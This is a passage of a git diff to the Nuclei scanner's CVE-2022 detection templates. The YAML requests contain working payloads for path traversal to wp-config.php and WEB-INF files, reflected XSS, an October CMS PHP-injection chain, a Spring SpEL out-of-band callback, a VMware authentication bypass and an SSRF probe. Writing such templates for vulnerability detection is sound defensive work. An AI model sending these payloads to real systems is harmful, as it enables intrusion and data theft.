system, potentially leading to complete compromise of the firewall. + remediation: | + Upgrade to a patched version of Sophos Firewall (>=18.5 MR4) to mitigate this vulnerability. + reference: + - https://github.com/killvxk/CVE-2022-1040 + - https://github.com/CronUp/Vulnerabilidades/blob/main/CVE-2022-1040_checker + - https://nvd.nist.gov/vuln/detail/CVE-2022-1040 + - https://www.sophos.com/en-us/security-advisories/sophos-sa-20220325-sfos-rce + - https://github.com/Mr-xn/Penetration_Testing_POC + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-1040 + cwe-id: CWE-287 + epss-score: 0.97434 + epss-percentile: 0.99939 + cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: sophos + product: sfos + shodan-query: http.title:"Sophos" + tags: cve,cve2022,sophos,firewall,auth-bypass,rce,kev + +http: + - method: POST + path: + - "{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"🦞\":\"test\"}" + + headers: + X-Requested-With: "XMLHttpRequest" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{\"status\":\"Session Expired\"}" + + - type: word + part: header + words: + - "Server: xxxx" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f080aa3d8834e42afae528c892504c545864a4171a3a9942ab2a67b241c8cfc40220077fa609e7ee21031571a5fa2ca2d814a59157fd47ce39dc7ba4e6310900f35f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1119.yaml b/nuclei-templates/CVE-2022/cve-2022-1119.yaml index 2e0ecf66e8..1deaf81022 100644 --- a/nuclei-templates/CVE-2022/cve-2022-1119.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-1119.yaml @@ -6,26 +6,38 @@ info: severity: high description: | WordPress Simple File List before 3.2.8 is vulnerable to local file inclusion via the eeFile parameter in the ~/includes/ee-downloader.php due to missing controls which make it possible for unauthenticated attackers retrieve arbitrary files. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise. + remediation: | + Update WordPress Simple File List to version 3.2.8 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e - https://wpscan.com/vulnerability/075a3cc5-1970-4b64-a16f-3ec97e22b606 - https://plugins.trac.wordpress.org/browser/simple-file-list/trunk/includes/ee-downloader.php?rev=2071880 - https://nvd.nist.gov/vuln/detail/CVE-2022-1119 + - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1119 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - tags: wp,wp-plugin,wpscan,cve,cve2022,lfi,wordpress + epss-score: 0.42222 + epss-percentile: 0.97228 + cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: simplefilelist + product: simple-file-list + framework: wordpress + tags: cve,cve2022,wp,wp-plugin,wpscan,lfi,wordpress,simplefilelist -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php" matchers-condition: and matchers: - - type: word part: body words: @@ -36,5 +48,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/06/29 +# digest: 4a0a00473045022100b1c39b9ee69004af99081759b453e9aaa588196617ca9d9d1e49abca87f79a4f022061ba2a637e812dfee7d8b615755dc6e16e41b5980d3569c3b6eab3232a4954c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1392.yaml b/nuclei-templates/CVE-2022/cve-2022-1392.yaml new file mode 100644 index 0000000000..81f38e8525 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1392.yaml @@ -0,0 +1,49 @@ +id: CVE-2022-1392 + +info: + name: WordPress Videos sync PDF <=1.7.4 - Local File Inclusion + author: Veshraj + severity: high + description: WordPress Videos sync PDF 1.7.4 and prior does not validate the p parameter before using it in an include statement, which could lead to local file inclusion. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server, potentially leading to further compromise of the system. + remediation: | + Upgrade to the latest version of WordPress Videos sync PDF plugin (>=1.7.5) or apply the vendor-provided patch to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815 + - https://packetstormsecurity.com/files/166534/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-1392 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-1392 + cwe-id: CWE-22 + epss-score: 0.01867 + epss-percentile: 0.87073 + cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: commoninja + product: videos_sync_pdf + framework: wordpress + tags: cve,cve2022,lfi,wp-plugin,unauth,wpscan,packetstorm,wp,wordpress,commoninja + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "failed to open stream: No such file or directory" + - "REPERTOIRE_VIDEOSYNCPDFreglages/Menu_Plugins/tout.php" + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022024a5506a3c00727ecfc4753913791b663aef57c426625d115e2bcbb557846a1f022100834c702542a6c6510bbec672cea1f477413753a349dbcd230b21b6e9c4daaaee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1439.yaml b/nuclei-templates/CVE-2022/cve-2022-1439.yaml new file mode 100644 index 0000000000..132e36833a --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-1439.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-1439 + +info: + name: Microweber <1.2.15 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: Microweber prior to 1.2.15 contains a reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Upgrade to Microweber CMS version 1.2.15 or later, which includes proper input sanitization to mitigate the XSS vulnerability. + reference: + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0/ + - https://huntr.dev/bounties/86f6a762-0f3d-443d-a676-20f8496907e0 + - https://github.com/microweber/microweber/commit/ad3928f67b2cd4443f4323d858b666d35a919ba8 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1439 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-1439 + cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,xss,huntr + +http: + - method: GET + path: + - '{{BaseURL}}/module/?module=%27onm%3Ca%3Eouseover=alert(document.domain)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url={{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "
alert(document.domain)",' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a00473045022100d284104de93b182d1704a792bdf51e256d3094c1c311c2b37ffe0b17d2f0cca302201543cd23a6fba386172040ad3430e6f03070f718e8061c3f2cf052e653f69edf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1815.yaml b/nuclei-templates/CVE-2022/cve-2022-1815.yaml index f7a27e1593..4a3bd44221 100644 --- a/nuclei-templates/CVE-2022/cve-2022-1815.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-1815.yaml @@ -1,26 +1,37 @@ id: CVE-2022-1815 info: - name: Drawio < 18.1.2 - Server Side Request Forgery + name: Drawio <18.1.2 - Server-Side Request Forgery author: amit-jd severity: high description: | - SSRF in /service endpoint in jgraph/drawio prior to 18.1.2. Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository jgraph/drawio prior to 18.1.2. + Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources or services. + remediation: | + Upgrade Drawio to version 18.1.2 or later to mitigate the SSRF vulnerability. reference: - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 - https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f - https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8 + - https://nvd.nist.gov/vuln/detail/CVE-2022-1815 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-1815 - cwe-id: CWE-918 + cwe-id: CWE-918,CWE-200 + epss-score: 0.02327 + epss-percentile: 0.89496 + cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* metadata: - verified: "true" - tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph + verified: true + max-request: 1 + vendor: diagrams + product: drawio + tags: cve,cve2022,huntr,drawio,ssrf,oast,oss,jgraph,diagrams -requests: +http: - raw: - | GET /service/0/test.oast.me HTTP/2 @@ -32,3 +43,4 @@ requests: - "contains(body, 'Interactsh Server')" - status_code == 200 condition: and +# digest: 4b0a004830460221009f35d80f39006377b499e7582c11b749772582ca4778c993f70157a0094e4bf4022100bb90c3f428c55557012fa9b0accf22af9f738541f92fb8a086a73427e971ad1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-1904.yaml b/nuclei-templates/CVE-2022/cve-2022-1904.yaml deleted file mode 100644 index 37cac91201..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1904.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2022-1904 - -info: - name: WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting - author: Akincibor - severity: medium - description: | - WordPress Easy Pricing Tables plugin before 3.2.1 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape a parameter before reflecting it back in a page available to any user both authenticated and unauthenticated when a specific setting is enabled. - reference: - - https://wpscan.com/vulnerability/92215d07-d129-49b4-a838-0de1a944c06b - - https://nvd.nist.gov/vuln/detail/CVE-2022-1904 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1904 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: wp,wordpress,wpscan,cve,cve2022,wp-plugin,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - ' - Color' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-1906.yaml b/nuclei-templates/CVE-2022/cve-2022-1906.yaml deleted file mode 100644 index 0cf1efbc16..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-1906.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2022-1906 - -info: - name: WordPress Copyright Proof <=4.16 - Cross-Site-Scripting - author: random-robbie - severity: medium - description: | - WordPress Copyright Proof plugin 4.16 and prior contains a cross-site scripting vulnerability. It does not sanitize and escape a parameter before outputting it back via an AJAX action available to both unauthenticated and authenticated users when a specific setting is enabled. - reference: - - https://wpscan.com/vulnerability/af4f459e-e60b-4384-aad9-0dc18aa3b338 - - https://nvd.nist.gov/vuln/detail/CVE-2022-1906 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-1906 - cwe-id: CWE-79 - metadata: - google-query: inurl:/wp-content/plugins/digiproveblog - verified: "true" - tags: wordpress,xss,wp-plugin,wp,wpscan,cve,cve2022 - -requests: - - raw: - - | - GET /wp-admin/admin-ajax.php?action=dprv_log_event&message=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "got message " - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-21371.yaml b/nuclei-templates/CVE-2022/cve-2022-21371.yaml new file mode 100644 index 0000000000..d9160b01fe --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21371.yaml @@ -0,0 +1,64 @@ +id: CVE-2022-21371 + +info: + name: Oracle WebLogic Server Local File Inclusion + author: paradessia,narluin + severity: high + description: An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data. + impact: | + An attacker can read sensitive files containing credentials, configuration details, or other sensitive information. + remediation: | + Apply the latest security patches provided by Oracle to fix the vulnerability. + reference: + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21371 + - https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786 + - http://packetstormsecurity.com/files/165736/Oracle-WebLogic-Server-14.1.1.0.0-Local-File-Inclusion.html + - https://github.com/Mr-xn/CVE-2022-21371 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21371 + cwe-id: CWE-22 + epss-score: 0.96287 + epss-percentile: 0.9943 + cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: oracle + product: weblogic_server + tags: cve,cve2022,lfi,weblogic,oracle,packetstorm + +http: + - method: GET + raw: + - |+ + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + payloads: + path: + - .//WEB-INF/weblogic.xml + - .//WEB-INF/web.xml + + stop-at-first-match: true + unsafe: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body, "")' + - 'contains(body, "")' + condition: or + + - type: dsl + dsl: + - 'contains(header, "text/xml")' + - 'contains(header, "application/xml")' + condition: or + + - type: status + status: + - 200 +# digest: 4a0a0047304502201b66dcd3b9fc90c4fd5587d8c4311347fa46f77f7ba6b467dc8f9e93550decd40221008a2c7b052f8c872b04c9422b81c00210ace794722fb697ee8b61866818625acd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-21500.yaml b/nuclei-templates/CVE-2022/cve-2022-21500.yaml new file mode 100644 index 0000000000..578dc0e7cb --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-21500.yaml @@ -0,0 +1,56 @@ +id: CVE-2022-21500 + +info: + name: Oracle E-Business Suite <=12.2 - Authentication Bypass + author: 3th1c_yuk1,tess,0xpugazh + severity: high + description: | + Oracle E-Business Suite (component: Manage Proxies) 12.1 and 12.2 are susceptible to an easily exploitable vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise it by self-registering for an account. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle E-Business Suite accessible data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the Oracle E-Business Suite application. + remediation: | + Apply the necessary security patches or updates provided by Oracle to mitigate this vulnerability. + reference: + - https://orwaatyat.medium.com/my-new-discovery-in-oracle-e-business-login-panel-that-allowed-to-access-for-all-employees-ed0ec4cad7ac + - https://twitter.com/GodfatherOrwa/status/1514720677173026816 + - https://www.oracle.com/security-alerts/alert-cve-2022-21500.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-21500 + - https://www.oracle.com/security-alerts/cpujul2022.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21500 + epss-score: 0.92631 + epss-percentile: 0.98947 + cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 4 + vendor: oracle + product: e-business_suite + shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 + tags: cve,cve2022,oracle,misconfig,auth-bypass + +http: + - method: GET + path: + - '{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPrimaryCreate.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpIndividualUser.jsp' + - '{{BaseURL}}/OA_HTML/ibeCRgpPartnerPriCreate.jsp' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + words: + - 'Registration' + - 'Register as individual' + - '' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022077a908cc0f84943d99a897323cdeb2899210c5a6cd3d08634c62ced31283feeb022100a8428c5469152520da4ec621970240d45755a2c602d099e22dce986d12653785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-21705.yaml b/nuclei-templates/CVE-2022/cve-2022-21705.yaml deleted file mode 100644 index 1e09625694..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-21705.yaml +++ /dev/null @@ -1,109 +0,0 @@ -id: CVE-2022-21705 - -info: - name: October CMS - Remote Code Execution - author: iPhantasmic - severity: high - description: | - October CMS is susceptible to remote code execution. In affected versions, user input is not properly sanitized before rendering. An authenticated user with the permissions to create, modify, and delete website pages can bypass cms.safe_mode and cms.enableSafeMode in order to execute arbitrary code. This affects admin panels that rely on safe mode and restricted permissions. - remediation: | - The issue has been patched in Build 474 (1.0.474) and 1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe manually to installation. - reference: - - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe - - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 - - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-21705 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.2 - cve-id: CVE-2022-21705 - cwe-id: CWE-74 - tags: cve,cve2022,authenticated,rce,cms,octobercms,injection - -requests: - - raw: - - | # to obtain session_key and token - GET /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - - - | # to perform authentication and obtain admin cookies - POST /backend/backend/auth/signin HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} - - - | # to inject php code in Markup editor and perform exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onSave - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 - - - | # to obtain theme - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onCreateTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&type=page - - - | # to access the template page for generated exploit - POST /backend/cms HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-OCTOBER-REQUEST-HANDLER: onOpenTemplate - X-OCTOBER-REQUEST-PARTIALS: - X-Requested-With: XMLHttpRequest - - _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm - - cookie-reuse: true - - extractors: - - type: xpath - name: session_key - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" - internal: true - # Obtain _session_key for current OctoberCMS session - - - type: xpath - name: token - attribute: value - xpath: - - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" - internal: true - # Obtain _token for current OctoberCMS session - - - type: regex - name: theme - part: body - group: 1 - regex: - - '' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "Contact Form 7" - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/CVE-2022-22536.yaml b/nuclei-templates/CVE-2022/cve-2022-22536.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-22536.yaml rename to nuclei-templates/CVE-2022/cve-2022-22536.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-2290.yaml b/nuclei-templates/CVE-2022/cve-2022-2290.yaml index 7840533def..dff0f8b418 100644 --- a/nuclei-templates/CVE-2022/cve-2022-2290.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-2290.yaml @@ -5,22 +5,33 @@ info: author: dbrwsky severity: medium description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance. + remediation: | + Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/ - https://github.com/zadam/trilium - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7 - https://nvd.nist.gov/vuln/detail/CVE-2022-2290 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2290 cwe-id: CWE-79 + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 3 + vendor: trilium_project + product: trilium shodan-query: title:"Trilium Notes" - verified: "true" - tags: cve,cve2022,xss,trilium,huntr + tags: cve,cve2022,xss,trilium,huntr,trilium_project -requests: +http: - method: GET path: - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E' @@ -28,9 +39,9 @@ requests: - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename' stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: @@ -46,5 +57,4 @@ requests: - type: status status: - 404 - -# Enhanced by mp on 2022/09/14 +# digest: 4a0a004730450221009f17fcdc98badc0464257c420fab598e7343e41d66382b910b98fd7005d968a0022040758dbc4500b3ca9aaa3096213583ee7175eb34c798a02991e0af55731a6641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-22963.yaml b/nuclei-templates/CVE-2022/cve-2022-22963.yaml deleted file mode 100644 index f0cceb1d51..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-22963.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2022-22963 - -info: - name: Spring Cloud Function SPEL RCE - author: Mr-xn,Adam Crosser - severity: critical - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - classification: - cve-id: CVE-2022-22963 - tags: cve,cve2022,springcloud,rce - -requests: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 diff --git a/nuclei-templates/CVE-2022/cve-2022-22972.yaml b/nuclei-templates/CVE-2022/cve-2022-22972.yaml new file mode 100644 index 0000000000..2ceac3d1c7 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-22972.yaml @@ -0,0 +1,113 @@ +id: CVE-2022-22972 + +info: + name: VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass + author: For3stCo1d,princechaddha + severity: critical + description: | + VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. + remediation: | + Apply the latest security patches or updates provided by VMware to fix the authentication bypass vulnerability (CVE-2022-22972). + reference: + - https://github.com/horizon3ai/CVE-2022-22972 + - https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive + - https://www.vmware.com/security/advisories/VMSA-2022-0014.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-22972 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22972 + cwe-id: CWE-287 + epss-score: 0.7146 + epss-percentile: 0.9778 + cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: vmware + product: identity_manager + fofa-query: app="vmware-Workspace-ONE-Access" || app="vmware-Identity-Manager" || app="vmware-vRealize" + tags: cve2022,cve,vmware,auth-bypass,oast + +http: + - raw: + - | + GET /vcac/ HTTP/1.1 + Host: {{Hostname}} + - | + GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1 + Host: {{Hostname}} + - | + POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1 + Host: {{interactsh-url}} + Content-type: application/x-www-form-urlencoded + + protected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in + + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "HZN=" + + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 302 + + extractors: + - type: regex + name: protected_state + group: 1 + regex: + - 'id="protected_state" value="([a-zA-Z0-9]+)"\/>' + internal: true + part: body + + - type: regex + name: horizonRelayState + group: 1 + regex: + - 'name="horizonRelayState" value="([a-z0-9-]+)"\/>' + internal: true + part: body + + - type: regex + name: userstore + group: 1 + regex: + - 'id="userstore" value="([a-z.]+)" \/>' + internal: true + part: body + + - type: regex + name: userstoreDisplay + group: 1 + regex: + - 'id="userstoreDisplay" readonly class="login-input transparent_class" value="(.*)"/>' + internal: true + part: body + + - type: regex + name: stickyConnectorId + group: 1 + regex: + - 'name="stickyConnectorId" value="(.*)"/>' + internal: true + part: body + + - type: kval + name: HZN-Cookie + kval: + - 'HZN' + part: header +# digest: 4a0a0047304502206403cd0d279ad3059877b01e431f357ec5373c9854c2ff5cbe853a8ac65ef39c022100d9069fe039d74cbcad2eb0f8ef4724af0436462068f8baecdb321328ac7a89af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-23134.yaml b/nuclei-templates/CVE-2022/cve-2022-23134.yaml index 53aca6a04f..6465ac9df7 100644 --- a/nuclei-templates/CVE-2022/cve-2022-23134.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-23134.yaml @@ -5,25 +5,41 @@ info: author: bananabr severity: medium description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration. + remediation: | + Apply 